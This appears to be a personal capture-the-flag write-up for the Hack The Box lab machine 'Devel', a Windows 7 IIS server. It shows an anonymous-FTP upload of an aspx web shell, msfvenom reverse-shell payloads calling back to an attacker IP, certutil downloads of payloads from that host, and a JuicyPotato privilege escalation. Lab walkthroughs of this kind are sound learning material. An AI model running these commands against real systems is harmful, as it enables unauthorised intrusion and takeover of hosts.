search

Devel

Personal Rating: Medium

hashtag
Enumeration

sudo nmap -sV -sC <IP>

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7

It looks like I can access the directory of the IIS webserver via ftp.

If I can write files here I can place an aspx webshell

As seen here, this works.

hashtag
Shell Access

Generating a web shell payload:

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.16.6 LPORT=4444 -f aspx > shell.aspx

I received a connection, but it dies when I give a command and shows no output

I placed antak.aspx on the host with the same ftp put method. This worked, so I will create a shell from here.

hashtag
Internal Enumeration

PS> whoami

iis apppool\web

Got the user babis.

I ran systeminfo on the host and placed the output in a file. I then ran wesng over it to check for vulnerabilities. The system is an unpatched Windows 7 as it seems, so there should be plenty.

Perfect, this worked: certutil.exe -urlcache -f http://10.10.16.6:8000/winPEASx86.exe C:\Users\Public\winpeasx86.exe

Lets see if this works: cmd /c C:\Users\Public\winpeasx86.exe > C:\Users\Public\peasout.txt

I could get a proper reverse shell by creating this payload and uploading it with certutil:

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

The user has extensive privileges enabled that would allow for privesc regardless of vulnerabilities:

It seems like I cannot really use winpeas as I do not get any output.

hashtag
Privilege Escalation

Doing more research on the output of this:

python3 wes.py /HTBfolder/Boxes/HTB-Devel/systeminfo.txt -s critical > /HTBfolder/Boxes/HTB-Devel/wes-output.txt

This did not work http://www.exploit-db.com/exploits/15609/arrow-up-right

Trying this: CVE-2010-0232, I found this resource:

LogoGitHub - ycdxsb/WindowsPrivilegeEscalation: Collection of Windows Privilege Escalation (Analyse/PoC/Exploit)GitHubchevron-right

I found the exploit with searchsploit and it looks promising:

searchsploit kitrap

Shellcodes: No Results

searchsploit -p 11199

Actually, screw this, I want to try JuicyPotato again as it is basic and common. We need an x86 version of it in this case.

LogoImpersonating Privileges with Juicy PotatoMediumchevron-right

Generating a new shell:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.6 LPORT=7777 -f exe > privshell-x86.exe

Getting the exploit:

LogoGitHub - ivanitlearning/Juicy-Potato-x86: Juicy Potato for x86 WindowsGitHubchevron-right

Transferring the exploit:

certutil.exe -urlcache -f http://10.10.16.6:8000/Juicy.Potato.x86.exearrow-up-right juicypotato.exe

Transferring the shell:

certutil.exe -urlcache -f http://10.10.16.6:8000/privshell-x86.exe privshell.exe

Exploitation:

juicypotato.exe -p C:\Users\Public\privshell.exe -l 1337 -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

With a netcat listener open on my host, this worked!

If it would not have worked, I would have tried some other CLIDs, there are lists online and tools to list them on the device.

PreviousCozyHostingNextExplore

Last updated